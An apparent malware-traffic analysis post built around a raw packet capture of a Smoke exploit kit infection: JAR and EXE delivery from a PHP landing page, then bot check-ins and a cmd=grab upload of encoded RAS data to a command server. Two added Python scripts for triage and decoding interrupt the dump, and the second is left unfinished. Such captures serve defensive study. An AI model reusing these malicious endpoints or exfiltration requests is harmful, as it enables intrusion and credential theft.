Smoke Exploit Kit EK CONNECT 443 over 8888 Proxy Loads T150 Malware

By | June 19, 2015

2012-09-19 21:36:10.285073 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 1:182, ack 1, win 16425, length 181
E…..@…..
%……..”.w…….P.@)….CONNECT javadl-esd-secure.oracle[.]com:443 HTTP/1.0
User-Agent: jupdate
Host: javadl-esd-secure.oracle[.]com:443
Content-Length: 0
Proxy-Connection: Keep-Alive
Pragma: no-cache

2012-09-19 21:36:10.285330 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [.], ack 182, win 16384, length 0
E..(.~….$z….
%..”…….w…P.@..g……..
2012-09-19 21:36:10.535359 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [P.], seq 1:108, ack 182, win 16384, length 107
E………$…..
%..”…….w…P.@.’…HTTP/1.0 200 Connection Established
FiddlerGateway: Direct
StartTime: 03:36:10.858
Connection: close

2012-09-19 21:36:10.585478 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 182:314, ack 108, win 16398, length 132
E…..@…..
%……..”.w…… P.@..w……….{..PZs
..<.?........WY..........E.J..../.5... ..... . .2.8.......:........!.....javadl-esd-secure.oracle[.]com. ..............
2012-09-19 21:36:10.585742 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [.], ack 314, win 16384, length 0
E..(……$x….
%..”…… w..HP.@………..
2012-09-19 21:36:10.596367 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [P.], seq 108:1086, ack 314, win 16384, length 978
E……… …..
%..”…… w..HP.@………….M..PZs
M….f.1$..f..w.8n………. .,..o…Ji..}’~……….7….[N./………..t..q..n0..j0……….o.?|..O.J=./.5.R0 ..+……0..1+0)..U…”Created by http://www.fiddler2[.]com1!0…U.
…D.O._.N.O.T._.T.R.U.S.T1907..U…0.D.O._.N.O.T._.T.R.U.S.T._.F.i.d.d.l.e.r.R.o.o.t0…120828220000Z..220828215959Z0w1+0)..U…”Created by http://www.fiddler2[.]com1!0…U.
…D.O._.N.O.T._.T.R.U.S.T1%0#..U….javadl-esd-secure.oracle[.]com0..0.. *.H…………0……….M-…3y,…t./x.E… .r[1..6s..”…%….7…..fw.._^..d….n.M…>T.=k.)…%….D..]:l.B%.L..sW@……]…..1Z./{..z …g………..0..0…U…….0.0…U.%..0
..+…….0….U…..0….YS.}~v…….I…..0..1+0)..U…”Created by http://www.fiddler2[.]com1!0…U.
…D.O._.N.O.T._.T.R.U.S.T1907..U…0.D.O._.N.O.T._.T.R.U.S.T._.F.i.d.d.l.e.r.R.o.o.t…`.l.cX.E]….\.0 ..+……….$…=……,n…!.2.z..V.x.@.y+.Or.o.”……5y..EL^.`……h………3.a…..Dl&..m.P…x.l<.......aQ+.uR....O.$..dp.....S...;......
2012-09-19 21:36:10.597489 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 314:512, ack 1086, win 16153, length 198
E…..@…..
%……..”.w..H….P.?…………….
…..;W..C.Pk.2…e…..h.j.Kx..Q#.%.9…6I.\…..8…..gL…l~.|x.Q…4.,…..c.N……….k.B…J2………O……F.h’?..c………….0C7J.n…+{… ……_X..(.{6..”….&..E….d..I.
2012-09-19 21:36:10.597750 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [.], ack 512, win 16384, length 0
E..(……$v….
%..”…….w…P.@………..
2012-09-19 21:36:10.599188 IP 192.168.186.6.8888 > 10.37.130.4.49172: Flags [P.], seq 1086:1145, ack 512, win 16384, length 59
E..c……$:….
%..”…….w…P.@..F…………0(vD.joy

2012-09-19 21:39:05.885040 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.58788: 3828 1/0/0 A 67.215.66.132 (52)
`.2K.<............B...................< .5... fe80::21c:42ff:fe00:18.53: 12988+ AAAA? mfodjf393843218.us. (36)
`….,.@…………..< ..........B........5.,..2............mfodjf393843218.us.....
2012-09-19 21:39:06.381332 IP6 fe80::f4f9:fe0f:f7d9:3c09.62130 > fe80::21c:42ff:fe00:18.53: 12988+ AAAA? mfodjf393843218.us. (36)
`….,.@…………..< ..........B........5.,..2............mfodjf393843218.us.....
2012-09-19 21:39:06.535629 IP 10.37.130.1.53 > 10.37.130.4.53546: 3828 1/0/0 A 67.215.66.132 (52)
E..P……..
%..
%…5.*.<...............mfodjf393843218.us.................C.B.
2012-09-19 21:39:06.535667 IP 10.37.130.4 > 10.37.130.1: ICMP 10.37.130.4 udp port 53546 unreachable, length 88
E..l……..
%..
%……….E..P……..
%..
%…5.*.<...............mfodjf393843218.us.................C.B.
2012-09-19 21:39:06.719436 IP6 fe80::89c0:1e6b:523b:4d63.64329 > ff02::1:3.5355: UDP, length 24
`…. ………….kR;Mc……………..I… ..|…………isatap…..
2012-09-19 21:39:06.719438 IP 10.37.130.2.58678 > 224.0.0.252.5355: UDP, length 24
E..4.!….Eu
%…….6… .5|…………isatap…..
2012-09-19 21:39:06.846271 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.62130: 12988 0/0/0 (36)
`….,…………B……………….< .5...,eo2............mfodjf393843218.us.....
2012-09-19 21:39:06.882808 IP 10.37.130.4.49175 > 10.37.130.2.8888: Flags [P.], seq 1:359, ack 1, win 256, length 358
E…..@…..
%..
%….”….3.6..P…….GET http://mfodjf393843218.us/logstat/forum/vida.php?a=2&key=667d2ef8926390c36c735d264e696b64 HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: mfodjf393843218.us
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive

2012-09-19 21:39:06.919456 IP 10.37.130.2.137 > 10.37.130.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N.#…..1
%..
%…….:.X.P………. EJFDEBFEEBFACACACACACACACACACAAA.. ..
2012-09-19 21:39:07.092131 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [.], ack 359, win 256, length 0
E..(.%@….Z
%..
%..”….6……P…=… EJFDE
2012-09-19 21:39:07.277823 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.62130: 12988 0/0/0 (36)
`….,…………B……………….< .5...,eo2............mfodjf393843218.us.....
2012-09-19 21:39:07.277862 IP6 fe80::f4f9:fe0f:f7d9:3c09 > fe80::21c:42ff:fe00:18: ICMP6, destination unreachable, unreachable port, fe80::f4f9:fe0f:f7d9:3c09 udp port 62130, length 92
`….\:@…………..< ..........B.......A;....`....,............B...................< .5...,eo2............mfodjf393843218.us.....
2012-09-19 21:39:07.669310 IP 10.37.130.2.137 > 10.37.130.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N.)…..+
%..
%…….:.X.P………. EJFDEBFEEBFACACACACACACACACACAAA.. ..
2012-09-19 21:39:08.419406 IP 10.37.130.2.137 > 10.37.130.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N.+…..)
%..
%…….:.X.P………. EJFDEBFEEBFACACACACACACACACACAAA.. ..
2012-09-19 21:39:09.269770 IP6 fe80::89c0:1e6b:523b:4d63.58073 > ff02::1:3.5355: UDP, length 24
`…. ………….kR;Mc………………… ..T…………isatap…..
2012-09-19 21:39:09.269771 IP 10.37.130.2.56985 > 224.0.0.252.5355: UDP, length 24
E..4.-….Ei
%……….. .
T…………isatap…..
2012-09-19 21:39:09.349571 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [P.], seq 1:332, ack 359, win 256, length 331
E..s..@…..
%..
%..”….6……P…….HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Thu, 20 Sep 2012 01:39:03 GMT
Content-Type: application/x-java-archive
Content-Length: 8425
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Last-Modified: Mon, 26 Jul 2001 05:00:00 GMT
ETag: "c81e728d9d4c2f636f067f89cc14862c"
Accept-Ranges: bytes
Vary: User-Agent

2012-09-19 21:39:09.349572 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [.], seq 332:1792, ack 359, win 256, length 1460
E…./@…..
%..
%..”….6.,….P….L..PK..
…….3A………… …META-INF/….PK..
…….3A..D………….META-INF/MANIFEST.MFManifest-Version: 1.0
Ant-Version: Apache Ant 1.8.2
Created-By: 1.7.0_03-b05 (Oracle Corporation)
Class-Path:
X-COMMENT: Main-Class will be added automatically by build

PK..
…….3A._UE…….. …App.class…….1.I
…)..*..+.., .-..
2012-09-19 21:39:09.918315 IP 10.37.130.4.49176 > 10.37.130.2.8888: Flags [P.], seq 1:245, ack 1, win 256, length 244
E…..@…..
%..
%….”….#”.EJP…._..GET http://mfodjf393843218.us/logstat/forum/ldr.php?s=java HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: mfodjf393843218.us
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
2012-09-19 21:39:27.598897 IP 10.37.130.2.8888 > 10.37.130.4.49176: Flags [P.], seq 1:277, ack 245, win 256, length 276
E..<.t@.....
%..
%.."...".EJ....P....B..HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Thu, 20 Sep 2012 01:39:06 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Accept-Ranges: bytes
Content-Disposition: inline; filename=load/129.exe

2012-09-19 21:39:27.598899 IP 10.37.130.2.8888 > 10.37.130.4.49176: Flags [.], seq 277:1737, ack 245, win 256, length 1460
E….u@….V
%..
%..”…”.F^….P…….MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……….q…”…”…”…”…”…”…”h..”…”…”…”…”…”…”…”…”…”Rich…”……..PE..L…..YP……………
.@…0……………P….@………………………………………………………………..]..(………………………………P………………………….\..H…………P………………………….text….<.......@.................. ..`.rdata..@....P... ...P..............@..@.data...| ...p.......p..............@....rsrc...............................@..@..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
2012-09-19 21:39:39.130609 IP 10.37.130.4.49177 > 65.55.185.26.80: Flags [P.], seq 1:380, ack 1, win 256, length 379
E….a@…..
%..A7…..PKkf.”.9.P…….GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: windowsupdate.microsoft[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close

2012-09-19 21:39:39.130680 IP 65.55.185.26.80 > 10.37.130.4.49177: Flags [.], ack 380, win 16384, length 0
E..(……..A7..
%…P..”.9.KkhQP.@….. EJFDE
2012-09-19 21:39:39.657997 IP 65.55.185.26.80 > 10.37.130.4.49177: Flags [FP.], seq 1:399, ack 380, win 16384, length 398
E……….’A7..
%…P..”.9.KkhQP.@.`…HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 151
Content-Type: text/html
Location: /windowsupdate/v6/default.aspx
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 20 Sep 2012 01:39:35 GMT
Connection: close

Object moved

Object Moved

This object may be found here.

2012-09-19 21:39:39.658036 IP 10.37.130.4.49177 > 65.55.185.26.80: Flags [.], ack 400, win 255, length 0
E..(.d@…..
%..A7…..PKkhQ”.;ZP…….
2012-09-19 21:39:39.658140 IP 10.37.130.4.49177 > 65.55.185.26.80: Flags [F.], seq 380, ack 400, win 255, length 0
E..(.e@…..
%..A7…..PKkhQ”.;ZP…….
2012-09-19 21:39:39.658267 IP 65.55.185.26.80 > 10.37.130.4.49177: Flags [.], ack 381, win 16384, length 0
E..(……..A7..
%…P..”.;ZKkhRP.@….qTTP/1.
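Added example, not part of the original post: a small Python triage script that walks tcpdump -A text like the dump above, pulls the HTTP request or response out of each packet, and flags the stages of the chain seen here (the CONNECT through the local :8888 proxy, a Java runtime pulling a JAR from a PHP landing page, an executable pushed back with a Content-Disposition filename, the PE DOS stub on the wire, and a POST of an opaque base64 blob to the check-in script). SAMPLE is a constructed, trimmed copy of packets from this capture, with the junk IP/TCP header bytes that tcpdump -A prints left in as they appear; the finding labels and the script itself are my own, not tooling from the post.

```python
# Added example (not from the original post): triage tcpdump -A text for the
# EK -> loader chain shown above.  SAMPLE is a constructed, trimmed copy of
# packets from this capture, junk IP/TCP header bytes included as printed.
import re

HDR = re.compile(r"^(\d{4}-\d{2}-\d{2} [\d:.]+) IP6? (\S+) > (\S+): ")
START = re.compile(r"(GET|POST|CONNECT) \S+ HTTP/1\.[01]|HTTP/1\.[01] \d{3}")
B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")
DOS_STUB = "This program cannot be run in DOS mode"

SAMPLE = r"""2012-09-19 21:36:10.285073 IP 10.37.130.4.49172 > 192.168.186.6.8888: Flags [P.], seq 1:182, ack 1, win 16425, length 181
E.....@.....
%........".w.......P.@)....CONNECT javadl-esd-secure.oracle[.]com:443 HTTP/1.0
User-Agent: jupdate
Host: javadl-esd-secure.oracle[.]com:443
2012-09-19 21:39:06.882808 IP 10.37.130.4.49175 > 10.37.130.2.8888: Flags [P.], seq 1:359, ack 1, win 256, length 358
%....".....3.6..P.......GET http://mfodjf393843218.us/logstat/forum/vida.php?a=2&key=667d2ef8926390c36c735d264e696b64 HTTP/1.1
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: mfodjf393843218.us
2012-09-19 21:39:09.349571 IP 10.37.130.2.8888 > 10.37.130.4.49175: Flags [P.], seq 1:332, ack 359, win 256, length 331
%..".....6......P.......HTTP/1.1 200 OK
Content-Type: application/x-java-archive
Content-Length: 8425
2012-09-19 21:39:27.598897 IP 10.37.130.2.8888 > 10.37.130.4.49176: Flags [P.], seq 1:277, ack 245, win 256, length 276
%.."...".EJ....P....B..HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: inline; filename=load/129.exe
2012-09-19 21:39:27.598899 IP 10.37.130.2.8888 > 10.37.130.4.49176: Flags [.], seq 277:1737, ack 245, win 256, length 1460
%.."...".F^....P.......MZ...................@......!..L.!This program cannot be run in DOS mode..
2012-09-19 21:39:41.381591 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [P.], seq 1:485, ack 1, win 256, length 484
%..>L.A...P.*.X..y.P.......POST /kot150/index.php HTTP/1.1
Host: kotamserv150[.]com
Content-Length: 30
Content-Type: application/x-www-form-urlencoded

oA4AAADDzcSdx8XU0MzVx8nO0w==
"""

def packets(text):
    """Yield (timestamp, src, dst, ascii_payload) for each packet in tcpdump -A output."""
    cur, buf = None, []
    for line in text.splitlines():
        m = HDR.match(line)
        if m:
            if cur:
                yield (*cur, "\n".join(buf))
            cur, buf = m.groups(), []
        else:
            buf.append(line)
    if cur:
        yield (*cur, "\n".join(buf))

def http_messages(text):
    """Start line, lower-cased headers and body of every packet that carries an HTTP message."""
    out = []
    for ts, src, dst, blob in packets(text):
        m = START.search(blob)          # skip the IP/TCP header bytes printed before the HTTP text
        if not m:
            continue
        head, _, body = blob[m.start():].partition("\n\n")
        start, *hdr_lines = head.splitlines()
        hdrs = {k.strip().lower(): v.strip()
                for k, sep, v in (ln.partition(":") for ln in hdr_lines) if sep}
        out.append({"ts": ts, "src": src, "dst": dst, "start": start.strip(),
                    "headers": hdrs, "body": body})
    return out

def triage(text):
    """Return (finding, timestamp, endpoint) for each EK-chain indicator in the capture."""
    found = []
    for m in http_messages(text):
        h, start = m["headers"], m["start"]
        ua, ctype = h.get("user-agent", ""), h.get("content-type", "")
        disp, host = h.get("content-disposition", ""), h.get("host", "")
        is_resp = start.startswith("HTTP/")
        if start.startswith("CONNECT ") and m["dst"].rsplit(".", 1)[-1] == "8888":
            found.append(("CONNECT tunnel through the local :8888 proxy", m["ts"], host))
        if "Java/" in ua and ".php" in start:
            found.append(("Java runtime requesting a PHP resource", m["ts"], host))
        if is_resp and "x-java-archive" in ctype:
            found.append(("JAR served by the landing page", m["ts"], m["src"]))
        if is_resp and disp.lower().endswith(".exe"):
            found.append(("executable pushed as " + ctype + ", " + disp, m["ts"], m["src"]))
        if (start.startswith("POST ") and "x-www-form-urlencoded" in ctype
                and B64.fullmatch("".join(m["body"].split()))):
            found.append(("POST of an opaque base64 blob (check-in)", m["ts"], host))
    for ts, src, _dst, blob in packets(text):   # the PE body arrives in a later segment, so scan raw
        if DOS_STUB in blob:
            found.append(("PE DOS stub on the wire", ts, src))
    return found

if __name__ == "__main__":
    for finding, ts, endpoint in triage(SAMPLE):
        print(ts, finding, "[" + endpoint + "]")
```

Feed it the full dump with `tcpdump -A -r capture.pcap | python3 ek_triage.py` style piping (file name assumed) and the six findings come out in capture order; on a real dump the Java/PHP and base64-POST checks are the noisy ones and are worth pairing with the Content-Disposition and DOS-stub hits before acting on them.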
2012-09-19 21:39:39.660317 IP6 fe80::f4f9:fe0f:f7d9:3c09.60020 > fe80::21c:42ff:fe00:18.53: 24186+ A? kotamserv150[.]com. (34)
`….*.@…………..< ..........B......t.5.*Y.^z...........kotamserv150[.]com.....
2012-09-19 21:39:40.650242 IP 10.37.130.4.50213 > 10.37.130.1.53: 24186+ A? kotamserv150[.]com. (34)
E..>.h……
%..
%…%.5.*..^z………..kotamserv150[.]com…..
2012-09-19 21:39:40.702803 IP6 fe80::21c:42ff:fe00:18.53 > fe80::f4f9:fe0f:f7d9:3c09.60020: 24186 1/0/0 A 62.76.188.65 (50)
`….:…………B……………….< .5.t.:.-^z...........kotamserv150[.]com.................>L.A
2012-09-19 21:39:40.703156 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [S], seq 2385156183, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.i@…..
%..>L.A…P.*.W…… ……………..
2012-09-19 21:39:41.098229 IP 10.37.130.1.53 > 10.37.130.4.50213: 24186 1/0/0 A 62.76.188.65 (50)
E..N……..
%..
%…5.%.:.O^z………..kotamserv150[.]com……………..>L.A
2012-09-19 21:39:41.098266 IP 10.37.130.4 > 10.37.130.1: ICMP 10.37.130.4 udp port 50213 unreachable, length 86
E..j.l……
%..
%……….E..N……..
%..
%…5.%.:.O^z………..kotamserv150[.]com……………..>L.A
2012-09-19 21:39:41.381428 IP 62.76.188.65.80 > 10.37.130.4.49178: Flags [S.], seq 3521870265, ack 2385156184, win 32768, options [mss 1460,wscale 1,nop], length 0
E..0…….n>L.A
%…P….y..*.Xp…J………..
2012-09-19 21:39:41.381470 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [.], ack 1, win 256, length 0
E..(.n@…..
%..>L.A…P.*.X..y.P…….
2012-09-19 21:39:41.381591 IP 10.37.130.4.49178 > 62.76.188.65.80: Flags [P.], seq 1:485, ack 1, win 256, length 484
E….o@…..
%..>L.A…P.*.X..y.P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 30
Content-Type: application/x-www-form-urlencoded

oA4AAADDzcSdx8XU0MzVx8nO0w==

2012-09-19 21:39:41.381682 IP 62.76.188.65.80 > 10.37.130.4.49178: Flags [.], ack 485, win 16384, length 0
E..(…….u>L.A
%…P….y..*. 10.37.130.4.49178: Flags [P.], seq 1:1368, ack 485, win 16384, length 1367
E………..>L.A
%…P….y..*. 10.37.130.4.49178: Flags [P.], seq 1368:2735, ack 485, win 16384, length 1367
E………..>L.A
2012-09-19 21:40:01.965890 IP 10.37.130.4.49181 > 10.37.130.2.8888: Flags [P.], seq 1:237, ack 1, win 256, length 236
E….(@…..
%..
%….”…{].*9#P….W..CONNECT javadl-esd-secure.oracle[.]com:443 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: javadl-esd-secure.oracle[.]com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive

2012-09-19 21:40:01.983717 IP 62.76.188.65.80 > 10.37.130.4.49180: Flags [S.], seq 1181345330, ack 3317545671, win 32768, options [mss 1460,wscale 1,nop], length 0
E..0……..>L.A
%…P..Fi.2….p……………
2012-09-19 21:40:01.983751 IP 10.37.130.4.49180 > 62.76.188.65.80: Flags [.], ack 1, win 256, length 0
E..(.)@…..
%..>L.A…P….Fi.3P…….
2012-09-19 21:40:01.983849 IP 10.37.130.4.49180 > 62.76.188.65.80: Flags [P.], seq 1:665, ack 1, win 256, length 664
E….*@…..
%..>L.A…P….Fi.3P….i..POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 209
Content-Type: application/x-www-form-urlencoded

cmd=grab&data=PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCldpbmRvd3MgUkFTDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KTmFtZTogSE1BVlBODQpQaG9uZTogMTI3LjAuMC4xDQoNCg==&login=591FB6543608B0F798F1B301B01D752D2E3A315C
2012-09-19 21:40:01.983986 IP 62.76.188.65.80 > 10.37.130.4.49180: Flags [.], ack 665, win 16384, length 0
E..(……. >L.A
%…P..Fi.3…_P.@.x…x.f..8
2012-09-19 21:40:02.160078 IP 10.37.130.2.8888 > 10.37.130.4.49181: Flags [.], ack 237, win 256, length 0
E..( $@….[
%..
%..”….*9#..|IP….:……w.
2012-09-19 21:40:02.855177 IP 10.37.130.4.49179 > 23.5.160.60.443: Flags [S], seq 3032434876, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4./@…..
%…..<......H....... .C...............
2012-09-19 21:40:03.504327 IP 23.5.160.60.443 > 10.37.130.4.49179: Flags [S.], seq 3996787922, ack 3032434877, win 32768, options [mss 1460,wscale 1,nop], length 0
E..0…….c…< %.......:$...H.p....B..........
2012-09-19 21:40:03.504405 IP 10.37.130.4.49179 > 23.5.160.60.443: Flags [.], ack 1, win 256, length 0
E..(.1@…..
%…..<......H..:$.P...C...
2012-09-19 21:40:03.543814 IP 10.37.130.4.49179 > 23.5.160.60.443: Flags [P.], seq 1:192, ack 1, win 256, length 191
E….2@…..
%…..<......H..:$.P...DD.............PZs.......^q.|.*{ |`V......`Q.....*. .../.....3.2............... ...............c. .4.2............... . .........................................!.....javadl-esd-secure.oracle[.]com
2012-09-19 21:40:03.544031 IP 23.5.160.60.443 > 10.37.130.4.49179: Flags [.], ack 192, win 16384, length 0
E..(…….j…< %.......:$...I|P.@.YI...isata
2012-09-19 21:40:05.136255 IP 62.76.188.65.80 > 10.37.130.4.49180: Flags [P.], seq 1:220, ack 665, win 16384, length 219
E……….B>L.A
%…P..Fi.3…_P.@.*…HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Thu, 20 Sep 2012 01:39:59 GMT
Content-Type: text/html; charset=win-1251
Content-Length: 0
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
2012-09-19 21:40:06.225737 IP 10.37.130.4.49182 > 62.76.188.65.80: Flags [P.], seq 1:560, ack 1, win 256, length 559
E..W.N@…..
%..>L.A…P….4…P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 104
Content-Type: application/x-www-form-urlencoded

hUYAAADm6OG44uDx9urm7vaj6eri7Ou4sLy0w8ezsLG2s7W9x7XDsry9w7THtrW0
x7W0wbKwt8G3wLbEtrSwxqP16vfxuLSxt7Ow

2012-09-19 21:40:06.225809 IP 10.37.130.4.49183 > 62.76.188.65.80: Flags [P.], seq 1:547, ack 1, win 256, length 546
E..J.O@…..
%..>L.A…P%..=J?.$P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 92
Content-Type: application/x-www-form-urlencoded

aDsAAAALBQxVDw0cAAcbHBtOBAcPAQZVXVFZLipeXVxbXlhQKlguX1FQLlkqW1hZ
KlhZLF9dWixaLVspW1ldKw==

2012-09-19 21:40:06.225849 IP 62.76.188.65.80 > 10.37.130.4.49182: Flags [.], ack 560, win 16384, length 0
E..(. ……>L.A
%…P..4…….P.@..9.. EJFDE
2012-09-19 21:40:06.225913 IP 62.76.188.65.80 > 10.37.130.4.49183: Flags [.], ack 547, win 16384, length 0
E..(.
……>L.A
%…P..J?.$%.._P.@….. EJFDE
2012-09-19 21:40:06.227050 IP 10.37.130.4.49184 > 62.76.188.65.80: Flags [P.], seq 1:547, ack 1, win 256, length 546
E..J.P@…..
%..>L.A. .Pw.!.`F./P…….POST /kot150/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kotamserv150[.]com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml
Accept-Language: en-gb;q=0.8,en;q=0.7
Accept-Encoding: identity;q=0
Connection: close
Content-Length: 92
Content-Type: application/x-www-form-urlencoded

xDsAAACnqaD5o6Gwt6yhqKjiqKujrar58f31goby8fD38vT8hvSC8/38gvWG9/T1
hvT1gPPx9oD2gfeF9/Xxhw==
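Added example, not part of the original post: a Python decoder for the form bodies the bot POSTs to /kot150/index.php above. The five bodies are copied from the capture. The cmd=grab upload is plain base64 of text and decodes to a block headed "Windows RAS" with a Name/Phone entry; the other four bodies decode to non-printable bytes for which this page gives no key or format, so the script only reports their size and leading bytes instead of guessing at a scheme. Field splitting is done by hand rather than with urllib's parse_qs because the bot posts raw base64 (padding '=' included, no percent-encoding), which parse_qs would mangle.

```python
# Added example (not from the original post): decode the POST bodies sent to
# /kot150/index.php in the capture above.  The bodies are copied from the
# capture; the splitting and printable-text check are my own, not the bot's code.
import base64

# The four opaque check-in bodies, as posted (line wrapping as shown on the page).
CHECKIN_BODIES = [
    "oA4AAADDzcSdx8XU0MzVx8nO0w==",
    "hUYAAADm6OG44uDx9urm7vaj6eri7Ou4sLy0w8ezsLG2s7W9x7XDsry9w7THtrW0"
    "x7W0wbKwt8G3wLbEtrSwxqP16vfxuLSxt7Ow",
    "aDsAAAALBQxVDw0cAAcbHBtOBAcPAQZVXVFZLipeXVxbXlhQKlguX1FQLlkqW1hZ"
    "KlhZLF9dWixaLVspW1ldKw==",
    "xDsAAACnqaD5o6Gwt6yhqKjiqKujrar58f31goby8fD38vT8hvSC8/38gvWG9/T1"
    "hvT1gPPx9oD2gfeF9/Xxhw==",
]
# The cmd=grab upload, as posted.
GRAB_BODY = (
    "cmd=grab&data=PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCldpbmRvd3MgUkFT"
    "DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KTmFtZTogSE1BVlBO"
    "DQpQaG9uZTogMTI3LjAuMC4xDQoNCg=="
    "&login=591FB6543608B0F798F1B301B01D752D2E3A315C"
)

def split_form(body):
    """Split a form body on '&' and the first '=' only.  No percent-decoding on
    purpose: the bot posts raw base64 ('=' padding included), which parse_qs
    would treat as separators and whose '+' it would turn into spaces."""
    fields = {}
    for part in body.split("&"):
        k, _, v = part.partition("=")
        fields[k] = v
    return fields

def b64(blob):
    """Base64-decode a body, dropping the line wrapping the page applied."""
    return base64.b64decode("".join(blob.split()), validate=True)

def looks_like_text(data):
    """True if every byte is printable ASCII or CR/LF/TAB."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)

def decode_grab(body):
    """Decode a cmd=grab upload into its command, login id, raw bytes and (if printable) text."""
    f = split_form(body)
    raw = b64(f["data"])
    return {"cmd": f["cmd"], "login": f["login"], "raw": raw,
            "text": raw.decode("ascii") if looks_like_text(raw) else None}

def classify_checkins(bodies):
    """Per opaque body: decoded length, first six bytes as hex, printable flag.  No decryption attempted."""
    rows = []
    for body in bodies:
        raw = b64(body)
        rows.append((len(raw), raw[:6].hex(), looks_like_text(raw)))
    return rows

if __name__ == "__main__":
    g = decode_grab(GRAB_BODY)
    print("cmd=%s login=%s (%d bytes)" % (g["cmd"], g["login"], len(g["raw"])))
    print(g["text"])
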